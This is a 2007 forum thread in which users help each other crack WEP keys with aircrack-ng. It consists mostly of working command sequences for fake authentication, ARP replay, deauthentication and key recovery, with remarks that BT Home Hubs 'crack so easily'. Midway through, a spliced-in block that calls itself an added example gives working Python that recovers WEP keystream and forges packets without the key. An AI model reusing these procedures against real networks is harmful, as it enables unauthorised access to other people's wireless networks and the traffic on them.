WEP cracking with no clients


john12312
03-15-2007, 11:53 PM
Hello,

I'm quite new to this, so some of my commands might be wrong.

I'm trying to crack a 64-bit WEP key on channel 3.

I'm the only one using the router's wireless signal, so I think I need to do a fake association, i.e. create another client. This is what I do (made-up MACs):

1// Kismet c, s, enter, L to lock card to channel
kismet

2// monitor mode enabled
airmon-ng start eth1 11

3// Start packet capture on channel 3
airodump-ng -w capture -c 3 eth1

4// This works to get association
aireplay-ng -1 0 -e BTHomeHub-3AD0 -a 00:14:7F:91:D4:0D -h 00:09:5B:C5:C2:B5 eth1

5// Start capture
aireplay-ng -3 -b 00:14:7F:91:D4:0D -h 00:09:5B:C5:C2:B5 -x 600 eth1

6//
aireplay-ng -0 -e BTHomeHub-3AD0 -a 00:14:7F:91:D4:0D -h 00:09:5B:C5:C2:B5 eth1

7// Aircrack
aircrack-ng -f 4 -n 64 capture-11.cap

Can someone spot the error, because I just cannot get it working?

Cheers

godfather
03-17-2007, 12:10 AM
You can try the fragmentation attack; it is fast. Good luck.

lostone
03-17-2007, 04:26 AM
On step 2 try putting: airmon-ng start eth1 3
And the capture file in your aircrack command should be capture-01.

john12312
03-17-2007, 01:51 PM
Doesn't Kismet put the card into monitor mode, so airmon-ng doesn't need to be started?

I don't think Centrino cards are supported for packet injection.

Mines an Intel PRO/Wireless 3945ABG with the ipw3945-1.2.0 driver.

What does anyone else think?

Cheers

scully69
03-17-2007, 09:28 PM
I use BT v1 as it puts your card in monitor mode as soon as you run Kismet. As for the BTHomeHub, they crack so easily, but I can't crack one with BT v2 as it adds wifi0, then ath0, then ath1, and then it says my card doesn't monitor. I'd stay with BT v1; it does BT hubs in 10 mins max as long as the power is above 5 in airodump.

Itssid
03-18-2007, 06:49 AM
To put your card in monitor mode use this command:

'iwconfig DEVICE mode monitor'
(DEVICE is your interface; you can find it out by starting Kismet.)

ram360
04-03-2007, 10:28 AM
The list of options from aireplay-ng:
Code:
*Attack 0: Deauthentication
*Attack 1: Fake authentication
*Attack 2: Interactive packet replay
*Attack 3: ARP request replay attack
*Attack 4: KoreK chopchop attack
*Attack 5: Fragmentation attack

You're using option 1. I would recommend trying 2, which will allow you to repeatedly spam the router with data from live traffic passing to/from it. It usually has a better chance of spurring up traffic.

I'd also recommend flipping through some of the options available for aireplay here on the developer's site.

arvee
04-19-2007, 11:11 AM
This works for me:


airodump-ng -c 3 -w capture01 ath1 (IV capture; add --ivs to capture only IVs)

aireplay-ng -a mac -h fakemac -e apname ath1 -1 0 (fake auth)

aireplay-ng -b mac -h fakemac ath1 -3 (ARP replay)

aircrack-ng capture01 (find key)

aircrack-ptw capture01 (find key faster with fewer IVs)

Hope that helps.
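To make the procedure above (and attacks 3 and 5 in ram360's list) concrete, here is an added toy model of WEP-40; it is example code written for this page, not code from the thread or from the aircrack-ng project. It shows why re-injecting one captured ARP request makes the AP emit a stream of fresh IVs (WEP has no replay protection), why the first 8 plaintext bytes of every ARP frame are known (the LLC/SNAP header), and how those 8 bytes of keystream are enough to forge a valid fragment under the same IV without the key, which is the first step of the fragmentation attack. The key, IVs, MACs, IPs and the `ToyAP` class are all constructed for illustration; 802.11 headers are omitted.

```python
"""Toy WEP-40 model: RC4 keystream, CRC-32 ICV, no replay protection.
Added example, not from the thread or aircrack-ng. All values below
(key, IVs, MACs, IPs) are constructed, not captured from a real network."""
import struct
import zlib

# Every ARP frame begins with this LLC/SNAP header before WEP is applied,
# so these 8 plaintext bytes are always known to an attacker.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
KEY = bytes.fromhex("0102030405")            # constructed 40-bit WEP key
CLIENT_MAC = bytes.fromhex("000000000001")   # constructed
CLIENT_IP = bytes([192, 168, 1, 10])         # constructed
TARGET_IP = bytes([192, 168, 1, 1])          # constructed


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling, then `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """frame = IV || RC4(IV || key) XOR (plaintext || ICV)."""
    return iv + xor(plaintext + icv(plaintext), rc4(iv + key, len(plaintext) + 4))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext, or None if the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def arp_request() -> bytes:
    """LLC/SNAP header + 28-byte ARP request (who-has TARGET_IP, tell CLIENT_IP)."""
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      CLIENT_MAC, CLIENT_IP, b"\x00" * 6, TARGET_IP)
    return LLC_SNAP_ARP + arp


class ToyAP:
    """Accepts any frame whose ICV verifies (no replay counter, as in WEP)
    and relays the broadcast ARP request under a fresh IV each time."""

    def __init__(self, key: bytes):
        self.key = key
        self.next_iv = 0x1000  # arbitrary IV counter start

    def receive(self, frame: bytes):
        data = wep_decrypt(self.key, frame)
        if data is None:
            return None  # rejected: bad ICV
        iv = struct.pack("<I", self.next_iv)[:3]
        self.next_iv += 1
        return wep_encrypt(self.key, iv, data)


def arp_replay(ap: ToyAP, captured: bytes, count: int) -> set:
    """aireplay-ng -3 in miniature: inject the same captured ARP request
    `count` times; return the distinct IVs the AP used for its relays."""
    return {ap.receive(captured)[:3] for _ in range(count)}


def recover_keystream(frame: bytes) -> bytes:
    """First 8 keystream bytes for this frame's IV, from the known LLC/SNAP
    header (step one of the fragmentation attack; also the known plaintext
    aircrack-ptw relies on when fed ARP traffic)."""
    return xor(frame[3:11], LLC_SNAP_ARP)


def forge_fragment(frame: bytes, payload: bytes) -> bytes:
    """Forge a valid 4-byte fragment (4 data + 4 ICV = 8 keystream bytes)
    under `frame`'s IV using only the recovered keystream, never the key."""
    assert len(payload) == 4
    return frame[:3] + xor(payload + icv(payload), recover_keystream(frame))


if __name__ == "__main__":
    ap = ToyAP(KEY)
    captured = wep_encrypt(KEY, b"\x00\x00\x01", arp_request())
    print("distinct IVs from 50 replays:", len(arp_replay(ap, captured, 50)))
    forged = forge_fragment(captured, b"\xde\xad\xbe\xef")
    print("forged fragment accepted by AP:", ap.receive(forged) is not None)
```

Two things the model leaves out matter in practice. A real AP only relays frames whose source MAC is associated, which is exactly what the `-1 0` fake-authentication step provides for the `-h fakemac` address; and the real fragmentation attack (`aireplay-ng -5`) repeats the forging step, sending multi-fragment frames the AP reassembles and re-encrypts, to grow the 8 known keystream bytes into a full 1500-byte PRGA file that can then encrypt arbitrary packets.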

Baxter
04-19-2007, 11:44 AM
arvee
That works for me too :)
I also add -x 1000 to my ARP replay.

rooster
04-23-2007, 06:41 PM
Hey Baxter, why do you add -x 1000? I know that "-x" is the number of packets per second, but why do you choose 1000? Can you also go higher? What are your experiences?


Baxter
04-23-2007, 07:16 PM
I think -x 1024 is the highest. Don't know why I only use -x 1000, but my ARPs go twice as fast when I do. Cuts my time in half. I'm using a Senao 200mW FW 1.7.4 with hostap drivers.

Baxter
04-26-2007, 11:09 PM
Here's a video with -x 1000. It's not too fast at that time because I was injecting two APs with only one card and no clients, plus I was running xvidcap, which slows everything down too. But you'll get the idea.
http://www.youtube.com/watch?v=kB2Hv6NuKWM